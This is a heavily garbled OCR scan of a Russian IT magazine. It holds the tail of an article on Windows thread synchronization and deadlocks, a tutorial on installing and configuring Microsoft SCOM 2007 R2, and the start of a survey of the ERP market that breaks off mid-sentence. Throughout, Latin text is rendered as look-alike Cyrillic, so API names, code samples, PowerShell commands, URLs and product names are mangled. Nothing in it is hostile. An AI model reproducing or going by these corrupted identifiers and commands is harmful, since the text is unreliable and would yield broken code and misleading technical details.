рует исключение ЕХСЕРТ10М_Р0581ВЕЕ_0ЕА0ШСК, которое вполне 
может означать, что в приложении случилась взаимоблокировка 
потоков — сіеасііоск. Но об этом чуть позже, пока скажутолько, что не 
стоит эти исключения заворачивать в пи 11. 

Помимо ЕпІегСгіІісаІЗесІіоп есть еще ТгуЕпІегСгіІісаІЗесІіоп, которая 
не ожидает освобождения объекта критической секции, а просто 
возвращает ЕАЕ5Е, если потоку не удалось войти в сгііісаі зесііоп. 
Если все нормально, и объект захвачен, то функция вернет ТРПЕ. И 
не забываем удалять объекты секций, когда они больше не нужны, с 
помощью ПеІе1;еСгі1;іса15ес1;іоп. 

Атомарные операции 

Атомарные операции — это еще один вид синхронизации в многопо- 
точных приложениях. Но их главное отличие от всего прочего заклю- 
чается втом, чтоони выполняютлишь простые действия. Для каждой 
атомарной операции есть своя АРІ -функция. Все эти АРІ начинаются 
со слова Іпіегіоскесі, и количество их потрясает воображение :). 
Например, можно атомарно увеличить или уменьшить на единицу 
какую-либо переменную. Это будет полез но для реализации счетчика 
ссылокв мультипоточных приложениях. 

Скорость выполнения атомарных операций выше, чем у критической 
секции. Дело втом, что всеэти команды поддерживаются науровне 
процессора, то есть компилятор генерирует единственную команду в 
машинном коде, которая выполняется СРП в один заход. 

ОеасІІоск 

Вернемся к дедлокам. Для того чтобы лучше понять суть этого 
явления, рассмотрим небольшой пример. 

Тут возможен сІеасНоск 

ОІЛІОКО ІЛІІМАРІ 1;ІігеасІ1(ІРѴОІО рагат) 

{ 

: :1лІаі1;Рог5іп§1еОЬзес1;(ІіЕѵеп1;А, ІМРІМІТЕ); 



: :1лІаі1;Рог5іп§1еОЬзес1:(ІіЕѵеп1;В^ ІМРІМІТЕ); 

} 

ОІЛІОКО ІЛІІМАРІ 1;ІігеасІ2(ІРѴОІО рагат) 

{ 

: :1лІаі1;Рог5іп§1еОЬзес1:(ІіЕѵеп1;В^ ІМРІМІТЕ); 

: :1лІаі1:Рог5іп§1еОЬдес1:(ІіЕѵеп1;А^ ІМРІМІТЕ); 

} 

Унасестьдва потока, которые поочередно ожидаютдва ивента:Аи В. 
Возможна такая ситуация, при которой первый потокзахватит событие 
А и будет ожидать освобождения события В, а второй поток, наоборот, 
захватит еѵепі В и будетждать А. В этом случае мы получим взаимобло- 
кировку, которая приведет к полному зависанию этих двух тредов. 

Для того чтобы этого избежать, следует либо использовать 
\Л/а|1;ЕогМиШр[еОЬ]ес1;5 с параметром ЬѴѴаііАН, равным ТРОЕ, либо 
ожидать события А и В в жестко оговоренным порядке. И то и другое 
достаточно сложно сделать в больших системах. Плюс дедлокам под- 
вержены и критические секции, где мы не можем переложить заботу 
о них на плечи ОС, используя \Л/а|1;ЕогМиШр1еОЬ]ес1;5. 

Для решения этой проблемы используются разнообразные паттерны 
проектирования, которые помогают избежать таких неприятностей 
даже в самыхзапутанных ситуациях. Но, ксожалению, рассказ о 
таких приемахтребует отдельной статьи, поэтому здесь я ограничусь 
предупреждением насчеттого, чего стоит опасаться при работе с 
объектами синхронизации. 

Заключение 

Все, что было описано выше, — лишь верхушка айсберга. В рамках 
одной статьи нельзя полностью раскрыть тему синхронизации по- 
токов и совместного доступа к ресурсам. Тем не менее, все, что мы 
рассмотрели в этой статье, вполне может составить хорошую основу 
для правильного написания многопоточных приложений, а конкрет- 
ные нюансы — они ведь все равно познаются на практике. ^ 
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■ ■ Сергей «дгіпсіег» Яремчук (дгіпсІегШІих.іп.иа) 




Сетевой эскулап 

8СОМ: решение для мониторинга и диагностики 
систем 

Управление большим количеством разнородных систем никогда не было, да и не могло быть про- 
стым. Ведь в процессе работы необходимо отслеживать десятки параметров, вовремя диагностируя (и 
предотвращая) проблемы. Вручную это сложно, а написать соответствующие скрипты могут лишь са- 
мые опытные админы. Впрочем, эти скрипты будут лишены визуального представления, так понятного 
начальству. 



Назначение и архитектура 5СОМ 

Для управления сложными ИТ-инфраструктурами Місгозоі'і; 
предлагает целый ряд продуктов Бузіет Сепіег, позволяющих 
упростить множество рутинных задач администрирования, по- 
высив эффективность работы сисадмина. ПродуктБСОМ 2007 Р2 
(ОрзМдг, Бузіет Сепіег Орегаііопз Мападег2007 Р2) появился как 
дальнейшее развитие МОМ 2005 (Місгозоі'і; Орегаііопз Мападег). В 
его задачи входит собирать все журналы в одном месте, управлять 
и мониторить ОС, сервисы и приложения в гетерогенной среде 
ѴѴіпсІоѵѵз, Ыпих и ОМІХ. Преимущество 5С0М — представление 
информации обо всех отслеживаемых компонентах в единой 
консоли, что дает возможность лучше контролировать происходя- 
щие процессы. Все данные связываются в логическую цепочку, то 
есть, если, например, вышел из строя 501-сервер, администратор 
получитуведомления отом, что все взаимосвязанные приложения 
перестанут работать. 

Для мониторинга используется несколько средств. Сбор данных о 
конфигурации систем и текущем состоянии осуществляютустанов- 
ленные агенты (служба управления Зузіет Сепіег), отправляющие 
все собранное на сервер управления (Мападетепі; Зегѵег). В 
случае возникновения проблем агент не только генерирует пред- 
упреждение, НОИ может выполнить заранее предусмотренные 
действия для ее устранения. Возможен мониторинг без агентов, 
когда 500 М в том числе перехватывает сообщения, отправленные 
службой «Доктор Ватсон». При этом данные (при помощи ВВС) 
сервером управления будут собираться непосредственно или при 
помощи одного из компьютеров с установленным агентом-прокси. 
Учитывая, что такой подход более ресурсоемкий, рекомендуется 
мониторить не более 10 безагентных систем на один сервер управ- 
ления и 60 — на группу. В разветвленной сети обычно разворачи- 
вают несколько серверов управления, один из них (обычно первый 
установленный) является корневым. Вся собранная информация 
сохраняется в нескольких базах М5 501 Вегѵег — оперативная (до 
7 дней) и долгосрочная (Ваіаѵѵагебоизе, 1 год). 

Все элементы объединяются в группу управления (Мападетепі 
Огоир), которая представляет собой логически обособленную 
единицу со своими настройками, некое подобие ѵѵогкд гои р в сети 
ѴѴіпсІоѵѵз. В большой сети для удобства и безопасности можно ис- 
пользовать несколько МО, причем агент может отправлять данные 
четырем группам. 

В разветвленных сетях для связи с сервером ОрзМдг используют 
шлюз ОрзМдг, который, являясь единой точкой доступа (прокси), 
отвечаетза аутентификацию агентов. 

Управление производится при помощи графической консоли, веб- 
интерфейса или командной строки РоѵѵегОбеІІ. В интернете можно 
найти десятки готовых Р5-скриптов практически под любые за- 



дачи администрирования. Например, большая коллекция собрана 
на портале Бузіепп Сепіег Сепігаі ( зѵзіеппсепіегсепігаі.сопп ). 
Количество систем, ресурсов и приложений может быть большое, 
вручную набирать правила мониторинга для такого числа — за- 
дача напряжная. В 5С0М для этой цели используются пакеты 
управления (Мападетепі Раскз), которые и содержат все не- 
обходимое. По сути, внутри описание приложения, его структура, 
связи с другими приложениями и мониторы (состояние), задачи 
на восстановление и так далее. Их наличие упрощает настройку 
и дальнейшее диагностирование. Собственно МР и являются 
основной фишкой 5С0М, определяющей его функциональность. 
Часть таких пакетов разрабатывается самой М5. Причем после 
выхода нового продукта от М5, чуть позже объявляется о по- 
явлении соответствующего пакета. Так, например, 5С0М стал 
поддерживать М5 Рогеі'гопі; ТМО, Вузіепп Сепіег Ваіа Ргоіесііоп 
Мападег 20 ІОи другие. Кроме этого любая сторонняя компания 
или комьюнити может добавить пакет для мониторинга нужного 
приложения. Необходимые ссылки для закачки дополнительных 
Мападетепі Раскз можно найти на домашней странице 5С0М 
или сторонних ресурсах (вроде того же зѵзіеппсепіегсепігаі.сот ). 
При желании легко самому написать пакет, осуществляющий сбор 
данныхпоБММРи конвертирование в формат, понятный 5С0М. 
Если интересует, на Тес ИМ еі доступно подробное описание. Сами 
пакеты могут быть двоичного формата или в виде ХМЕ-файла. 
Параметры первого изменить напрямую нельзя, для этого исполь- 
зуются переопределения. В ХМЕ можно вносить изменения как 
непосредственно, так и скопировав его, с другим именем. 

Также 5С0М строит графики загруженности и позволяет модели- 
ровать возникновение проблем. Сервер отчетности (РерогЕпд 
5егѵег), устанавливаемый как дополнительный компонент, предо- 
ставляет широкий функционал в построении различных отчетов. 
Кроме этого при развертывании ОрзМдг доступен инструмент — 
Аисііі; СоИесЕоп Бегѵісез (АС5), позволяющий хранить и анализиро- 
ватьлоги событий безопасности. 

В 5С0М реализована гибкая система ролей, в которой пользо- 
ватели получают лишь действительно необходимые права на 
управление или получение данных. В настоящее время актуаль- 
ной является версия 5С0М 2007 Р2, в которой улучшен интерфейс, 
процедура импорта модулей, используются новые шаблоны, 
встроена поддержка Еіпих/ЕІпіх и многое другое. 

Установка 5СОМ 

Процедуру я бы не назвал сверхсложной, ноучитывая многочис- 
ленные зависимости, иногда не разруливающиеся автоматически, 
в ее процессе просто следует быть внимательнее. В том смысле, 
что лихо нажимая клавишу МехЕ получить на выходе работе- 
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в поставке 5СОМ содержится более 48 ЛЛападетепІ Раск 



способный 5С0М весьма маловероятно — по ходу потребуется 
доустановка компонентов, багфиксов и сервиспаков. Причем 
бывает и так, что все вроде бы есть, а не работает... Вероятно, это 
происходит из-за того, что ОрзМдг вышел передѴѴіп2к8 и изна- 
чально не поддерживал новую ось, а все проблемы совместимости 
рихтовались при помоіди сервиспаков (Р2 вышел в 2009 году). По 
этой причине перед началом установки 5С0М следует накатить 
(согласен, перед такими делом всегда следует накатить — прим, 
ред.) в ОС все обновления. 

Для работы серверной части нам понадобится компьютер (СРО 
от 2,8 ГГц, РАМ от 4 ГБ) под управлением ѴѴіп2кЗ/2к8/Р2, М5 
50Г Зегѵег вместе со службой отчетов М5 50Г Зегѵег (Рерогііпд 
Зегѵісез) плюс несколько дополнительных ролей и компонентов. В 
частности обязательна роль ѴѴеЬ Зегѵег (N5). Важно: 5С0М 2007 Р2 
официально не поддерживает М5 50Г 2008 5Р2 и Р2, только 50Г 
2005 5Р2 и 50Г 2008 5Р1 . Но между «не поддерживает» и «будет 
работать» разница очень большая. В установочном комплекте до- 
ступна утилита ВВСгеаІеѴѴігагсІ.ехе, которая поможет создать нуж- 
ные БД. Затем в процессе установки просто отключаем ВаІаЬазе и 
на следую идем этапе указываем параметры БД вручную. Впрочем, 
автоматом такая связка не пойдет [см. зиррогГтісгозоН.сопп/ 
кЬ/242571 4 ). Да, кстати, не забудь открыть порты к 50Г-серверу в 
файере, какописано в с1ск.ги/Е1 7д . 

Список всех конфигураций приведен по адресу сІск.ги/РгСМ . 
плюс в комплекте доступен Ргегедиізііе Ѵіеѵѵег, который выдаст 
всю информацию касательно того, что нужно, и чего не хватает. 
Кроме того, нужны специфические настройки для компонентов, 
вроде установки N5 в автоматическую загрузку. Так что перед 
установкой нужно запускать, смотреть, устранять и проверять. В 
консоли РоѵѵегЗЬеи достаточно дать команду: 



> Ітрог1:-МосІи1е 5егѵегМапа§ег 

> АсІсІ-1лІіпсІоы5Реа1;иге NЕТ-Ргатеыогк-Соге^1лIеЬ-Ме1:аЬа5е^ 
1лIеЬ-1лIМI^1лIеЬ-51:а1:іс-Соп1;еп1:^1лIеЬ-^е■Раи11;-^ос^1лIеЬ-^іг- 
Вгоы5Іп§^1лIеЬ-Н1:1:р-Еггог5^1лIеЬ-А5р-Nе1;^1лIеЬ-Nе1;-Еx1:^1лIеЬ- 
I5АРI-Еx1;^1лIеЬ-I5АРI-Рі11;ег^1лIеЬ-Рі11;егіп§^1лIеЬ-1лIіпсIоѵ\^5- 
Аи1:I^^ 1лІеЬ-М§т1;-Соп50Іе -г 

Плюс понадобится А5Р.МЕТ А)ах Ехіепзіопз. Его качаем по ссылке 
сІск.ги/РѵѵЕУ и ставим. Консоль управления не требует моидного 
компьютера, а в качестве ОС подойдет ѴѴіпХР/ѴІ5І;а/7. Кроме этого 
должна быть соответствуюидим образом подготовлена среда Асііѵе 
□ ігесіогу (имя домена, служба 0М5, уровень домена не ниже 2000). 
Для административных задач до начала установки следует создать 
отдельную О Іо Ьаі- группу и пять входя идих в нее учетных записей, 
две из которых — с правами локального администратора. 

Когда все требования выполнены, запускаем установочный файл. 
Обрати внимание, что агенты ОрзМдг, модуль создания отчетов, 
сервер сбора аудита и шлюз ОрзМдгустанавливаются из отдель- 
ных меню. 

На этапе выбора компонентов указываем, что будем ставить на 
сервер. Далее, если установидик не обнаружил ЗОЕ, вводим его 
да НН ы ей имя БД. После чего задаем данные учетной записи для 
Мападетепі; Зегѵег Асііоп Ассоипі, от имени которой выполняются 
основные операции и 50 К а псі СопГд Зегѵісе АссоипЕ После чего 
указываем метод проверки подлинности веб-консоли. Предлагае- 
мую по умолчанию проверку подлинности ѴѴіпсІоѵѵз следует оста- 
вить, если доступ к ней будет только из внутренней сети; если же к 
веб- консоли будут обраидаться через интернет, установи флажок 
«Использовать проверку подлинности» с помоидью форм. 

И на последнем шаге включаем обновление. По окончании обя- 
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Перед установкой следует проверить наличие компонен- 
тов при помощи Ргегесѵі$іІе Ѵіеѵѵег 



< Рге\поиз | Різсоѵег | СапсеІ | 

Выбор типа компьютера для установки агента 



зательно создаем архивную копию ключа, при помощи которого 
шифруются данные, здесь отказываться не стоит. Процесс прост, 
после активации появится простой визард, в котором следует 
указать имя файла и пароль для доступа. 

Аналогично просто доустанавливается модуль создания отчетов 
(ОаІаѵѵагеЬоизе и Рерогііпд Зегѵег), сервер АС5 и консоль управ- 
ления (на админском компе). 

Теперь можно регистрироваться в консоли или используя веб- 
интерфейс (по умолчанию — порт 51 908). 

Первоначальные задачи 
наСтроики 

Консольуправления организована классически, в стиле оутлука. 
Слева находится пять вкладок, при помощи которых выбирают- 
ся основные задачи, — Мопііогіпд, Аиібогіпд, Абтіпізігаііоп, 
Рерогііпд и Му ѴѴогкзрасе. Назначение их очевидно. Наиболее 
часто используемые функции, чтобы долго их не искать, можно со- 
бирать в Му ѴѴогкзрасе. При вы боре любо го пункта выше откроют- 
ся доступные параметры. Все события выводятся в поле посере- 
ди не, правое меню позволяет выполнить определенные действия. 
Советую некоторое время потратить на изучение консоли и 
разобраться с установками по умолчанию. Веб- кон соль содержит 
только две вкладки: Мопііогіпд и Му ѴѴогкзрасе и предоставляет, 
соответственно, меньшую функциональность. 

Список всех доступных командлетов Р5 можно получить, введя 
«ОеІ-ОрегаІіопМападегСоттапб». Например, чтобы получить 
список всех серверов управления, вводим команду: 

Р5> Се1;-тапа§етеп1;5егѵеп 

После установки можно проверить состояние сервера управления. 
Для этого переходим в Мопііогіпд и выбираем ссылку ѴѴіп б оѵѵз 
Сотриіег или Орегаііопз Мападег— Сервер управления. Состоя- 
ние должно быть показано как НеаНбу. Щелчок по данным сервера 
выведет дополнительную строку с более подробным описанием. 

Во вкладке Мопііогіпд также показываются все текущие предупре- 
ждения (аіегіз), диаграммы, задачи, приложения, устройства и 
так далее. В общем, все, что связано с мониторингом, мы найдем 
здесь. При выборе конкретного пункта в поле Асііопз показыва- 
ются возможные действия и связанная справка. Реализованы все 
необходимые инструменты — поиск, фильтр по времени и отобра- 
жение известного объекта. 

Еще один момент. При выборе основной задачи вполеРедиігеб 
Сопбдигаііоп Тазкз показывается список рекомендуемых даль- 



нейших операций. Выбирая последовательно пункты и следуя 
подсказкам, можно быстро настроить среду мониторинга, не особо 
вчитываясь в документацию. 

Если обслуживается несколько доменов, настраиваем интегра- 
цию с Асііѵе Вігесіогу, для этого выбираем ссылку СопЛдиге Асііѵе 
□ ігесіогу (АО) Іпіедгаііоп в поле Орііопаі Сопіідигаііоп. Далее 
стартует мастер, в котором и указываем нужные домены. 
Рекомендуется устанавливать агенты на удаленных системах при 
помощи консоли. Но в случае необходимости можно использо- 
вать локальную установку при помощи инсталляционного диска 
5С0М и другие варианты распространения (групповые политики, 
внедрить в образ и Т.П.). 

Итак, переходим в Абтіпізігаііоп и вызываем контекстное меню. 
Собственно большую часть операций по администрированию 
можно произвести, выбирая последовательно пункты этого 
контекстного меню (перемещаясь по не му сверху вниз). Здесь 
имеется около десятка пунктов, позволяющих развернуть агентов, 
создать/скачать/импортировать пакетуправления, создать новую 
роль пользователя, канал, подписку, добавить группу управления 
и некоторые другие. 

Для установки агента выбираем первый пункт — Оізсоѵегу 
ѴѴігагб. В результате наших нехитрых действий появится ма- 
стер, позволяющий найти нужные устройства. На первом шаге 
определяемся стипом компьютеров (ѴѴіпбоѵѵз, Еіпих или сетевое 
устройство), затем указываем, как искать (автоматически или 
«продвинутым» способом). При автоматическом способе мастер 
просканирует все компьютеры домена. Теперь задаем дополни- 
тельные критерии поиска (шаблон имени, рольит.п.), выбираем 
учетную запись, от имени которой будет производиться поиск, и 
нажимаем Оізсоѵегу. По окончании процесса отбираем объекты 
и указываем режим (адепі или адепііезз) и, переходя к следую- 
щему шагу, устанавливаем агенты. Устанавливаемые агенты, а 
также агенты, требующие обновления или не распределенные, 
появляются в подменю Репбіпд Мападеппепі. Затем, по оконча- 
нии (или после обновления), они автоматически переносятся в 
Адепі Мападеппепі, где в последующем можно отслеживать его 
состояние. 

После установки агент каждые 60 секунд отсылает пакет данных на 
сервер, допускается про пуск трех таких пакетов, после чего сер- 
вер пытается связаться с компьютером, и в случае неудачи меняет 
его статус. При необходимости администратор может настроить 
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5С0АЛ предоставляет админу диаграммы и грас|эики 



время отсылки пакетов глобально (Асіппіпізігаііоп 
Зеиіпдз НеагіЬеаІ;, максимум до одного дня) или 
индивидуально, изменить количество пропусков или 
вовсе отключить такой мониторинг (например, для 
компьютеров, подключающихся периодически). 

Еще одной интересной функцией 5С0М является цен- 
трализованная отсылка вМЗсообщенийСЕІРиоши- 
бок с клиентских компьютеров. Все это настраивается 
при помощи мастера Сііепі; Мопііогіпд Сопбдигаііоп, 
запускаемого из контекстного меню Мападетепі; 
Зегѵег. 

Создание оповещений 

Агент собирает данные, но в случае возникновения 
проблем, администратор о них узнает лишь при анали- 
зе да иных в консоли, арешение нередко необходимо 
принимать моментально. Поэтому следующий шаг- 
настройка предупреждений. Состоит он из нескольких 
несложных этапов. 

Так, после установки 5С0М не знает, что ему собирать, 
не различает приложения и сервисы. Как уже говори- 
лось выше, помочь ему в этом могут пакеты управле- 
ния. В поставке доступно почти 50 пакетов управления, 
просмотреть их список можно в Асітіпізігаііоп ^ 
Мападетепі; Ра ск. Выбор свойств любого покажет 
подробную информацию. Если имеющихся МР не- 
достаточно для контроля установленных сервисов и 
приложений, то следует поискать в указанных выше 
репозиториях, а затем — импортировать пакеты при 
помощи пунктов Воѵѵпіоасі Мападетепі Раск и Ітрогі 
Мападетепі Раск. После импорта 5С0М сравнивает 
данные агентов и информацию в пакетах, обнаруживая 
специфические приложения, и выводит все доступные 
атрибуты объектов. 

Следующий шаг — создание канала, то есть ме- 



тода оповещения администратора. Переходим в 
Моіііісаііопз Сбаппеі, в контекстном меню выбираем 
Меѵѵ и один из вариантов: етаіі, 1М,5М5и команда. 
После этого запускается мастер, который поможет на- 
строить выбранный канал. Например, в случае с етаіі 
задаем данные 5МТР-сервера и шаблон сообщения. 
Чтобы указать адреса получателей предупреждения, 
выбираем пункт Меѵѵ ЗиЬзсгіЬег, указываем имя под- 
писчика, время отсылки сообщений (по умолчанию 
всегда) и собственно адреса электронной почты. 

И наконец, создание подписки — ЗиЬзсгірІіопз. Пере- 
ходим в соответствующий пункт меню, выбираем Меѵѵ 
и следуем указаниям мастера. Важный шаг — соз- 
дание критериев, то есть типов сообщений, которые 
будут перенаправляться подписчику. Поумолчанию 
отправляются все сообщения, что не всегда удобно. 

В большой среде с несколькими админами вероятнее 
придется распределить их более точно, используя 
фильтры. Далее указываем подписчиков для события, 
выбираем канал. При необходимости — определяем 
задержку в отправке сообщения, чтобы не бежать 
сразу, ведь часто бываеттак, что проблемы решаются 
сами собой :). 

Теперь в случае сбоя админ получает сообщение с 
описанием ситуации, а для получения более подроб- 
ной информации можнотутже перейти по ссылке на 
веб-консоль. 

Заключение 

В статье затронуты лишь основные возможности такого 
весьма полезного инструмента какЗСОМ, который 
после настройки будет мониторить инфраструктуру, 
предупреждая админа о проблемах. При дальнейшем 
знакомстве тебе помогут документация проекта и, ко- 
нечно, собственные экспериментальные данные, тг 
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• Страница 5С0М 

— тісгозоН.сот/ 
орзтдг . 

• Документация по 
5С0М — Іесбпеі.ті- 
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• Форум Місгозоіі, 
посвященный 5С0М 
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• Портал Зузіет 
Сепіег Сепігаі — 
зузіетсепіегсепігаі. 
сот . 




• На компании 
среднего размера 
рассчитан Зузіет 
Сепіег Еззепііаіз. 

• Ходят слухи о воз- 
можном появлении 
следующей версии 
ОрзМдг, тем бо- 
лее, что некоторые 
решения из Сузіет 
Сепіег уже обно- 
вились, но пока ни 
окончательной даты, 
ни предрелиза никто 
не видел. 
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• 5С0М 2007 В2 не 
поддерживает 50Е 
2008 В2, только 50Е 
2005 5Р2и5СЕ 2008 
5Р1. 

• Не забудь открыть 
в файере порты к 
50Е-серверу — сіск. 
ги/Е17д . 
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ЕК.Р — на любой 
вкус! 

Обзор ЕКР-систем: да, про ОрепЗоигсе 
мы тоже не забыли 

Несмотря на большое количество систем ЕРР на рынке, выбор подходяідей системы ограничен доста- 
точно узким кругом решений. И этот совсем не очевидный факт надо учитывать при проведении вы- 
бора. О том, как правильно подойти к выбору ЕРР-системы, о сложившейся расстановке сил на россий- 
ском рынке и важных моментах самого выбора мы и будем говорить в нашей статье. 



Про цепи ограничений 

1. Сегментация рынка ЕРР 

Ключом в правильном выборе подходящей ЕКР-системы является 
точное позиционирование своей компании относительно карты 
решений того или иного производителя. 

Поясним эту мысль. Каждая ЕКР-система обладает определенной 
функциональностью, покрывает какое-то количество предмет- 
ных областей. Например, решение российской компании «1С» 

— «1С: Управление производственным предприятием» является 
универсальной системой (в терминах разработчика «Конфигу- 
рацией»), обеспечивающей управление основными функциями 
предприятия: учет товарных запасов, управление расчетами с 
контрагентами, учет основных средств и товарно-материальных 
ценностей и так далее. Таким образом, данный продукт более 
всего подходит для производственных компаний. А вот для авто- 
матизации розничной торговли придется выбрать конфигурацию 
«1С: Розница». Количество подобных базовых конфигураций у 
«1С» — более 20. Понятное дело, что выбрать нужное решение 
непросто. 

Подобными трудностями сложность задачи не исчерпывается. 
Кроме набора функциональности, которую поддерживает ЕКР, про- 
изводители вводят еще и отраслевую специализацию. Например, в 
линейке ЕКР-решений 5АР есть специализированные решения для 
финансового сектора, производственных компаний, компаний, 
работающих на рынке услуг, торговых компаний и общественных 
организаций (здравоохранение, образование и т.п.). 

Не нужно удивляться, что и это еще не все. Кроме указанных 
вариантов есть еще разделение продуктов по стоимости решения 
(свыше $1 млн, от $100 тыс. до $1 млн, до $100 тыс.), размерам 
бизнеса (крупный — оборот свыше $500 млн в год, средний — 
оборот от $100 млн до $500 млн в год, мелкий — оборот до $100 
млн в год) и количеству пользователей, подключенных к ЕКР- 
системе. Все это удивительно напоминает чехарду в тарифных 
планах сотовых операторов. Основная причина такого разноо- 
бразия — желание производителя ЕКР повысить ценность своего 
решения для потенциального заказчика. А поскольку подобная 
«кастомизация» несоизмеримо дешевле разработки нового про- 
дукта, то и используется подобная практика очень широко. 
Поэтому, возвратившись к началу нашей статьи, утвердим сле- 
дующий тезис: точное позиционирование своей компании отно- 
сительно карты решений того или иного производителя является 
ключом к успеху в выборе и внедрении ЕКР. 

Сегментация, или разделение рынка потенциальных клиентов 
на определенные группы, является обязательным элементом по- 



зиционирования ЕКР-системы. Основными измерениями такого 
позиционирования являются функциональность, отрасль, стои- 
мость, размер бизнеса. Таким образом, сегментация выглядит 
как многомерный куб, в котором указанные измерения являются 
осями координат. Обычно, при выборе системы проводят встречи 
с профессиональными консультантами. Основная задача которых 
— правильно спозиционировать компанию-клиента в много- 
мерной матрице решений различных производителей и пред- 
ложить наиболее подходящий для нее продукт. К сожалению, как 
правило, консультанты заранее ориентированы на определенное 
решение и стараются «натянуть» потребности клиента под воз- 
можности именно этого продукта. Поэтому наиболее рациональ- 
ный выход в этой ситуации — выбор нескольких консультантов с 
разными решениями. 

2. Ключевые игроки на рынке ЕРР 

Давайте рассмотрим ключевых игроков на российском рынке 
ЕКР-систем и остановимся на наиболее важных и интересных 
моментах, предлагаемых ими решений. 

По результатам 2009 года (данные за 2010 год еще не опублико- 
ваны), которые представила Ш5, российский рынок ЕКР-систем 
выглядит как изображено на рисунке 2. 

Впереди с большим отрывом идут решения от 5АР, далее следует 
российский продукт 1С, затем — решения от Огасіе, МісгозоК и 
наша «Галактика». Остаток под названием «другие» включает 
в себя десяток самых различных систем, «выживающих» или 
застолбивших свои огороды в той или иной нише. Интересно 
соотнести данные результаты, например, с мировыми рейтин- 
гами ЕКР-систем, согласно которым, мы видим немного другую 
ситуацию. 

Как мы уже говорили выше, многие разработчики имеют на 
рынке различные предложения для самых разных сегментов за- 
казчиков. Наличие большого пакета подобных решений является 
косвенным подтверждением устойчивого положения системы 
на рынке. Все крупные игроки имеют целый набор подобных 
решений. Для оценки зарубежных решений можно использовать 
квадрат Гартнера (рис. 3), который показывает рейтинги систем. 
Пойдем по порядку, рассмотрев представленные системы по ряду 
стандартных признаков — положение на рынке, позиционирова- 
ние, набор доступных модулей и т.д. 

5АР 

Положение на рынке 

Компания 5АР, ведущий поставщик бизнес-приложений в мире, 
давно (в течение 18 лет) и успешно вспахивает российскую 
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Сравнение ЕКР систем 




Управление закупками 
1.4 



ТСО на 7 лет 



Упраление 
производством 



Стоимость оборудования 



Управление складом 



Стоимость консалтинга 



Сводное планирование 



Стоимость лицензий 

Упра 
отношениями с... 



вление продажами 
Финансами 



У ЕКРЗ 
■ ЕРР2 
УЕКР1 



Диаграмма-радар как пример сравнения ЕРР-систем 



борозду ЕКР-систем. На данный момент компания выделяет два 
ключевых пакета для автоматизации бизнеса: 5АР Визіпезз Опе и 
5АР Ви5Іпе55 АИ-іп-Опе. 

Позиционирование 

5АР Ви5Іпе55 АИ-іп-Опе — полный пакет бизнес-приложений для 
крупных компаний, численностью до 2500 сотрудников. 5АР 
Визіпезз Опе — пакет бизнес-приложений для средних и мелких 
компаний, численностью до 100 сотрудников (понятное дело, 
работающих с системой) . 

Набор доступных модулей 

Состав модулей ЕКР-систем от 5АР покрывает все возможные 
функциональные области современного предприятия: управ- 
ление материальными потоками, планирование и исполнение 
производства, продажа и дистрибуция, логистика, управление 
жизненным циклом продукта, управление качеством, финансо- 
вый учет, контроллинг (учет затрат и прибыли), документообо- 
рот и отчетность. 

На сайте компании ( шшжзар.сот) доступен специальный конфи- 
гуратор, который позволяет сформировать необходимый пакет 
решений и рассчитать его ориентировочную стоимость (рис. 4) . 
Надо добавить, что в дополнение к данным двум продуктам 5АР 
предлагает дополнительные решения для некоторых ключевых 
процессов: 5АР 5СМ — решение по управлению цепочкой поста- 
вок, 5АР 5КМ — решение по управлению взаимоотношениями с 
поставщиками и так далее. 

Ключевые особенности 

Отметим ключевые особенности продуктов 5АР: детальная про- 
работка решения, как по отраслям, так и по процессам, высокая 
стабильность работы и производительность, высокая стоимость 
консалтинга — традиционно, консультанты по внедрению 5АР 
являются самыми дорогими на рынке. 

Огасіе 

Положение на рынке 

Следующий лидер в среде бизнес-приложений — компания 



Огасіе. Компания агрессивно поглощает лучшие решения в 
различных областях и включает их в состав своих приложений. 
Поэтому среди решений от Огасіе всегда можно найти то, которое 
удовлетворит потребности. Правда, остаются вопросы унифика- 
ции и интеграции приложений между собой. 

Позиционирование 

Флагманским продуктом категории ЕКР-решений является систе- 
ма Огасіе Е-Ви8Іпе55 5иіі:е. Пакет Огасіе Е-Визіпезз 5иіі:е ориенти- 
рован на крупные компании. Стоимость внедрения зависит от 
набора внедряемых модулей и составляет сотни тысяч условных 
единиц. В настоящее время доступна версия №12 данной системы. 

Набор доступных модулей 

в состав системы входят основные модули для управления 
предприятием: управление сервисом, управление финансами, 
управление человеческим капиталом, управление портфелем 
проектов, управление жизненным циклом активов, управление 
взаимоотношениями с заказчиками, планирование ресурсов 
предприятия, управление закупками, управление жизненным 
циклом продукта, управление цепочкой поставок, управление 
производством. Кроме того, для данного пакета доступны допол- 
нительные модули: управление производительностью предпри- 
ятия, управление риском и уровнем соответствия, управление 
мастер-данными, бизнес-одобрения для менеджеров, средства и 
технологии. 

Позиционирование 

Еще одним решением класса ЕКР от Огасіе является система 
ОКАСЕЕ’5 РЕ0РЕЕ50ЕТ ЕЫТЕКРК15Е. Система позиционируется 
как решение для крупных и средних компаний. 

Набор доступных модулей 

Набор модулей содержит традиционные для ЕКР-систем ком- 
поненты: управление жизненным циклом активов, управление 
взаимоотношениями с заказчиками, управление финансами, 
управление человеческим капиталом, управление портфелем 
проектов, управление цепочкой поставок, управление закуп- 
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Рисі. Базовая функциональность ЕРР 



Использованные материалы: 



• Системы управления бизнесом БАР: 

зар.сот/сіз/зте/зоІибопз/Ьизіпеззппападеппепі/соппрагеЬт/ 

'псіех.ерх . 

• Официальный сайт компании Огасіе: 
огасІе.сопп/ги/ргосІисІз/аррІісаІіопз/еЬизіпезз/іпсІех.ЫппІ . 

• Официальный сайт компании Місгозоі'1; 
ппісгозоі'і.сопп/гиз/сіѵпаппісз/сіеі'аиіі.ппзрх . 

• Сайт компании «Фронтстеп» 
ФопІзІер.ги/ргосІисІз/БѵІеипе/ІпЬгЕРРБѵІеипе . 

• Сайт компании «Галактика» 
даіакбка.гц . 

• Сайт компании «1 С» 

Ѵ8.ІС.ГЦ . 

•ТАОѴІБЕР — центр выбора технологий и поставщиков 
Іасіѵізег.ги . 

ками. Но кроме того, в данном решении есть, например, такой 
экзотический модуль, как управление кампусом. На российском 
рынке это решение продвигается не очень активно, хотя некото- 
рые внедрения имеются. 

Позиционирование 

Решением от Огасіе для среднего и малого бизнеса является набор 
приложений Огасіе’5 ІН Ебшагбз Епііегргізе Опе. 

Набор доступных модулей 

Данное решение включает в себя достаточно полный набор приложе- 
ний: управление жизненным циклом активов, управление взаимо- 
отношениями с заказчиками, управление финансами, управление 
человеческим капиталом, разработка и производство, управление 
заказами, управление проектами, недвижимость и строительство, 
планирование цепочки поставок, управление цепочкой поставок, 
управление закупками, производство продуктов питания и напит- 
